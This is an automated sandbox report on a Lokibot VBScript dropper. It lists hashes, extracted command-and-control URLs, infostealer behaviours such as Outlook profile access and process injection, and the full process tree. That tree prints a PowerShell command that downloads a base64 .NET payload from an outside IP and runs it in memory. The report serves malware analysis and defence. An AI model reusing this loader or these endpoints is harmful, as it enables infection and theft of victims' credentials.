Analysis
- max time kernel: 100s
- max time network: 120s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 03-10-2022 10:22
- Static task: static1
- Behavioral task: behavioral1
  - Sample: PD3007800123.vbs
  - Resource: win7-20220812-en
- Behavioral task: behavioral2
  - Sample: PD3007800123.vbs
  - Resource: win10v2004-20220812-en
General
- Target: PD3007800123.vbs
- Size: 219KB
- MD5: d873de1b3b907887305e325426c407d5
- SHA1: 99c502d13b119a1b614f7384a3ba83fab10cd85d
- SHA256: eedb863078dbdbd83a0d52d86dd779f27115360e17676e539602f4e1a8c9437c
- SHA512: c4577d024fbbd2ea7b143d9780c7ca9f813f914c7d820151acfcc5ba7a92ebea832537a9847b5a7d203df6f00186be6d9bc5a26e515c705badeee985def3ffa1
- SSDEEP: 48:DVK0hbQvuivLvyvTxYvsvuiv7vu2vJR2vFvvvfv1KvFvDv2UfHvrvUvgYvc2vGgR:xKWdUIlVcWHfvGvXimF
Malware Config
- Extracted: http://20.7.14.99/dll/dll_ink.pdf
- Extracted (lokibot):
  - http://iklok.us/li/UN/yours_me.php
  - http://kbfvzoboss.bid/alien/fre.php
  - http://alphastand.trade/alien/fre.php
  - http://alphastand.win/alien/fre.php
  - http://alphastand.top/alien/fre.php
Signatures
- Blocklisted process makes network request (2 IoCs)
  Processes (flow, PID, process):
  - flow 4, PID 1648, powershell.exe
  - flow 10, PID 1648, powershell.exe
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Processes (description, IoC, process):
  - Key value queried: \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation (WScript.exe)
- Drops startup file (1 IoC)
  Processes (description, IoC, process):
  - File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk (powershell.exe)
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
  Processes (description, IoC, process):
  - Key opened: \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook (RegAsm.exe)
  - Key opened: \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook (RegAsm.exe)
  - Key opened: \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook (RegAsm.exe)
- Suspicious use of SetThreadContext (1 IoC)
  Processes (description, PID, process, target process):
  - PID 1648 set thread context of 3608: 1648 powershell.exe -> RegAsm.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes (PID, process):
  - 1648 powershell.exe
  - 1648 powershell.exe
  - 4136 powershell.exe
  - 4136 powershell.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes (description, PID, process):
  - Token: SeDebugPrivilege, 1648 powershell.exe
  - Token: SeDebugPrivilege, 4136 powershell.exe
  - Token: SeDebugPrivilege, 3608 RegAsm.exe
- Suspicious use of WriteProcessMemory (13 IoCs)
  Processes (description, PID, process, target process):
  - PID 4716 wrote to memory of 1648: 4716 WScript.exe -> powershell.exe (2 events)
  - PID 1648 wrote to memory of 4136: 1648 powershell.exe -> powershell.exe (2 events)
  - PID 1648 wrote to memory of 3608: 1648 powershell.exe -> RegAsm.exe (9 events)
- outlook_office_path (1 IoC)
  Processes (description, IoC, process):
  - Key opened: \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook (RegAsm.exe)
- outlook_win_path (1 IoC)
  Processes (description, IoC, process):
  - Key opened: \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook (RegAsm.exe)
Processes
- C:\Windows\System32\WScript.exe (depth 1)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PD3007800123.vbs"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.emit/swen/36.81.331.591//:ptth'))
    - Blocklisted process makes network request
    - Drops startup file
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe (depth 3)
      Command line: "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\Debug.vbs
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe (depth 3)
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      - Accesses Microsoft Outlook profiles
      - Suspicious use of AdjustPrivilegeToken
      - outlook_office_path
      - outlook_win_path
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  - Filesize: 2KB
  - MD5: 6cf293cb4d80be23433eecf74ddb5503
  - SHA1: 24fe4752df102c2ef492954d6b046cb5512ad408
  - SHA256: b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
  - SHA512: 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  - Filesize: 1KB
  - MD5: 9bc7f1b87a2c2bc9983a37920272f493
  - SHA1: 1f4c28f4ddd202012474c28d857cae8f8f555ddf
  - SHA256: 13c488a6e5d81afee96b146445e7c2b153995b546bba9c6cbc4f5244eae843b1
  - SHA512: 9c0869d87ff9f71da92b73bbdcda5328a2633de6b8d32ed253f8fea52768bdacb6bebad49ec97006494da8cc5e9008453e5901de28e30d4b560e734d98f0f3c7
- memory/1648-132-0x0000000000000000-mapping.dmp
- memory/1648-133-0x000001FE6A300000-0x000001FE6A322000-memory.dmp (Filesize: 136KB)
- memory/1648-134-0x00007FFC1D440000-0x00007FFC1DF01000-memory.dmp (Filesize: 10.8MB)
- memory/1648-141-0x00007FFC1D440000-0x00007FFC1DF01000-memory.dmp (Filesize: 10.8MB)
- memory/3608-138-0x00000000004139DE-mapping.dmp
- memory/3608-137-0x0000000000400000-0x00000000004A2000-memory.dmp (Filesize: 648KB)
- memory/3608-143-0x0000000000400000-0x00000000004A2000-memory.dmp (Filesize: 648KB)
- memory/3608-144-0x0000000000400000-0x00000000004A2000-memory.dmp (Filesize: 648KB)
- memory/3608-145-0x0000000000400000-0x00000000004A2000-memory.dmp (Filesize: 648KB)
- memory/4136-136-0x00007FFC1D440000-0x00007FFC1DF01000-memory.dmp (Filesize: 10.8MB)
- memory/4136-135-0x0000000000000000-mapping.dmp